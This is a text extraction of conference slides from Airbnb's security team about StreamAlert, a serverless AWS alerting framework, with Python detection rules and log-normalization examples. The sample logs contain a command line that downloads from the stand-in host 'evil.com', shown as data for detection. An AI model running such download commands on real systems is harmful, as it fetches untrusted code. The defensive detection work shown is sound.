by Lin Chunyong and Ryan Deivert, Airbnb
AWS Data & Analytics Week is an opportunity to learn about Amazon’s family of managed analytics services. These services provide easy, scalable, reliable, and cost-effective ways to manage your data in the cloud. We explain the fundamentals and take a technical deep dive into Amazon Redshift data warehouse; Data Lake services including Amazon EMR, Amazon Athena, & Amazon Redshift Spectrum; Log Analytics with Amazon Elasticsearch Service; and data preparation and placement services with AWS Glue and Amazon Kinesis. You'll will learn how to get started, how to support applications, and how to scale.
2. 1. Who Are We
2. What is StreamAlert
3. Data Normalization
4. Threat Intel
5. StreamAlert Apps
6. The Future
3. 1. Who Are We
Ryan Deivert
CSIRT Engineer
Chunyong Lin
CSIRT Engineer
Austin Byers
CSIRT Engineer
Awesome You
CSIRT Engineer
Jack Naglieri
CSIRT Engineering
Manager
CSIRT Engineering
4. 1. Who Are We
2. StreamAlert
Incoming Data
Kinesis
SNS
S3
StreamAlert
Apps
Outgoing Alerts
Lambda
Slack
PagerDuty
S3
StreamAlert
Serverless real-time data analysis
streamalert.io
github.com/airbnb/streamalert
5. Why StreamAlert?
● Serverless
● Real-time alerting
● Scalable
● Infrastructure as code
● Simple deployment
● Extensive data format support
○ CSV, JSON, key-value, syslog
● Support for different use-cases
○ Security monitoring, compliance, ops
1. Who Are We
2. StreamAlert
7. from stream_alert.shared.rule import rule
@rule(logs=['ghe:general'],
outputs=['slack:alerts'])
def github_disable_two_factor_requirement_user(rec):
""" Alert if two-factor authentication requirement
was disabled for a user.
"""
return rec['action'] == 'two_factor_authentication.disabled'
Simple Python Rule
1. Who Are We
2. StreamAlert
9. from stream_alert.shared.rule import rule
@rule(logs=['cloudwatch:events'],
req_subkeys={'detail': ['userIdentity', 'eventType']})
def cloudtrail_root_account_usage(rec):
"""Alert when root AWS credentials are used."""
return (rec['detail']['userIdentity']['type'] == 'Root'
and rec['detail']['userIdentity'].get('invokedBy') is None
and rec['detail']['eventType'] != 'AwsServiceEvent')
More Complex Python Rule
1. Who Are We
2. StreamAlert
10. ● CloudWatch Logs & Events Rules
● S3 Buckets & Event Notifications
● Kinesis Streams and Firehose
● Simple Notification Service
AWS Services for Incoming Data
1. Who Are We
2. StreamAlert
11. ● Lambda
● DynamoDB
● System Manager Parameter Store
AWS Services for Rule Processing
1. Who Are We
2. StreamAlert
12. ● S3 Bucket
● Athena
● Simple Queue Service
● Lambda Function
AWS Services for Output
1. Who Are We
2. StreamAlert
13. Real-Time Data Analysis
Classify,
Normalize, Enrich,
and Process Rules
Alert
Dispatching
Alerts
Alert
Merging
Data Enrichment and Rule State
IOCs Rule Metadata
Outgoing Alerts
Lambda
Slack
PagerDuty
S3
Historical Search
Partitioning
Kinesis
Firehose
S3
Athena
S3 Events
Laptops,
Workstations,
Servers
SaaS
Applications
APIs
Other
Incoming Data
Kinesis
SNS
S3
StreamAlert
Apps
14. 1. Who Are We
2. StreamAlert
Alert Searching via Athena
15. {
"destinationAddress": "1.2.3.4",
"hostIdentifier": "cylin_mbp",
"cmdline": "wget -b evil.com",
"pid": "1234"
}
{
"destinationAddress": "1.2.3.4",
"hostIdentifier": "cylin_mbp",
"cmdline": "wget -b evil.com",
"pid": "1234"
}
1. Who Are We
2. StreamAlert
3. Normalization
{
"server": "cylin_server",
"command_line": "wget evil.com",
"computer_name": "cylin_mbp",
"md5": "ABCDEF123456",
"remote_ip": "1.2.3.4"
}
Log 1 from log_source_1: Log 2 from log_source_2:
{
"server": "cylin_server",
"command_line": "wget evil.com",
"computer_name": "cylin_mbp",
"md5": "ABCDEF123456",
"remote_ip": "1.2.3.4"
}
The Problem
16. from stream_alert.shared.rule import rule
BAD_IP = '1.2.3.4'
@rule(logs=['log_source_1'])
def bad_ip_address_log_source_1(rec):
"""Alert on the record from bad ip address from log_source_1"""
return rec['remote_ip'] == BAD_IP
{
"server": "cylin_server",
"command_line": "wget evil.com",
"computer_name": "cylin_mbp",
"md5": "ABCDEF123456",
"remote_ip": "1.2.3.4"
}
Log 1 from log_source_1:
from stream_alert.shared.rule import rule
BAD_IP = '1.2.3.4'
@rule(logs=['log_source_2'])
def bad_ip_address_log_source_2(rec):
"""Alert on the record from bad ip address from log_source_2"""
return rec['destinationAddress'] == BAD_IP
{
"destinationAddress": "1.2.3.4",
"hostIdentifier": "cylin_mbp",
"cmdline": "wget -b evil.com",
"pid": "1234"
}
Log 2 from log_source_2:
18. from stream_alert.shared.rule import rule
from helpers.base import fetch_values_by_datatype
BAD_IP = '1.2.3.4'
@rule(datatypes=['ipAddress'])
def bad_ip_address(rec):
"""Alert on the record from bad ip address."""
ip_addresses = fetch_values_by_datatype(rec, 'ipAddress')
return BAD_IP in ip_addresses
Example Rule, Normalization
1. Who Are We
2. StreamAlert
3. Normalization
19. Potential Considerations
● Too many bad ip addresses
● Lambda memory limitation
● How to update with new IOCs
● How to resolve False Positives
1. Who Are We
2. StreamAlert
3. Normalization
20. Classify & Normalize IOCs
● File hashes
● Domains
● IP addresses
1. Who Are We
2. StreamAlert
3. Normalization
4. Threat Intel
21. from stream_alert.shared.rule import rule, disable
from stream_alert.rule_processor.threat_intel import StreamThreatIntel
@rule(datatypes=['ipAddress'])
def threat_intel_ioc_match_ip_address(rec):
"""Alert on the record from bad ip address."""
if (StreamThreatIntel.IOC_KEY in rec
and rec[StreamThreatIntel.IOC_KEY].get('ip')):
return True
return False
Example Rule, Threat Intelligence
1. Who Are We
2. StreamAlert
3. Normalization
4. Threat Intel
22. StreamAlert
Rule Processor
StreamAlert Apps
SSM Parameter Store
App
Lambda
CloudWatch
Scheduled Event
More SaaS
applications
1. Who Are We
2. StreamAlert
3. Normalization
4. Threat Intel
5. Apps
23. 1. Who Are We
2. StreamAlert
3. Normalization
4. Threat Intel
5. Apps
Apps in Action
24. from stream_alert.shared.rule import rule
@rule(logs=['duo:authentication'])
def duo_fraud(rec):
"""Alert on any Duo authentication marked as fraud."""
return rec['result'] == 'FRAUD'
Duo
Push notification marked as fraudulent by the end user
1. Who Are We
2. StreamAlert
3. Normalization
4. Threat Intel
5. Apps
from stream_alert.shared.rule import rule
@rule(logs=['duo:authentication'])
def duo_fraud(rec):
"""Alert on any Duo authentication marked as fraud."""
return rec['result'] == 'FRAUD'
25. from helpers.base import ends_with_any
from stream_alert.shared.rule import rule
_VALID_EMAIL_SUFFIXES = {'@example.com', '@corp.example.com'}
@rule(logs=['box:admin_events'])
def box_events_non_domain_email(rec):
"""Alert on box logins with untrusted email addresses"""
if rec['event_type'] != 'LOGIN':
return False
email = rec['created_by'].get('login')
return not ends_with_any(email, _VALID_EMAIL_SUFFIXES)
Box
Box login with email outside of the trusted domain
1. Who Are We
2. StreamAlert
3. Normalization
4. Threat Intel
5. Apps
from helpers.base import ends_with_any
from stream_alert.shared.rule import rule
_VALID_EMAIL_SUFFIXES = {'@example.com', '@corp.example.com'}
@rule(logs=['box:admin_events'])
def box_events_non_domain_email(rec):
"""Alert on box logins with untrusted email addresses"""
if rec['event_type'] != 'LOGIN':
return False
email = rec['created_by'].get('login')
return not ends_with_any(email, _VALID_EMAIL_SUFFIXES)
from helpers.base import ends_with_any
from stream_alert.shared.rule import rule
_VALID_EMAIL_SUFFIXES = {'@example.com', '@corp.example.com'}
@rule(logs=['box:admin_events'])
def box_events_non_domain_email(rec):
"""Alert on box logins with untrusted email addresses"""
if rec['event_type'] != 'LOGIN':
return False
email = rec['created_by'].get('login')
return not ends_with_any(email, _VALID_EMAIL_SUFFIXES)
26. from stream_alert.shared.rule import rule
@rule(logs=['gsuite:reports'])
def gsuite_suspicious_logons(rec):
"""Alert on suspicious G Suite logins"""
if rec['id']['applicationName'] != 'login':
return False
for event in rec['events']:
if event.get('name') == 'login_challenge':
for param in event.get('parameters', []):
if (param.get('name') == 'login_challenge_status'
and param.get(value) == 'Challenge Failed.'):
return True
return False
G Suite
G Suite user failed challenge during login
1. Who Are We
2. StreamAlert
3. Normalization
4. Threat Intel
5. Apps
from stream_alert.shared.rule import rule
@rule(logs=['gsuite:reports'])
def gsuite_suspicious_logons(rec):
"""Alert on suspicious G Suite logins"""
if rec['id']['applicationName'] != 'login':
return False
for event in rec['events']:
if event.get('name') == 'login_challenge':
for param in event.get('parameters', []):
if (param.get('name') == 'login_challenge_status'
and param.get(value) == 'Challenge Failed.'):
return True
return False
27. Alert in PagerDuty
1. Who Are We
2. StreamAlert
3. Normalization
4. Threat Intel
5. Apps
28. 1. Who Are We
2. StreamAlert
3. Normalization
4. Threat Intel
5. Apps
6. The Future
In Progress
● Alert merging
● Rule “baking”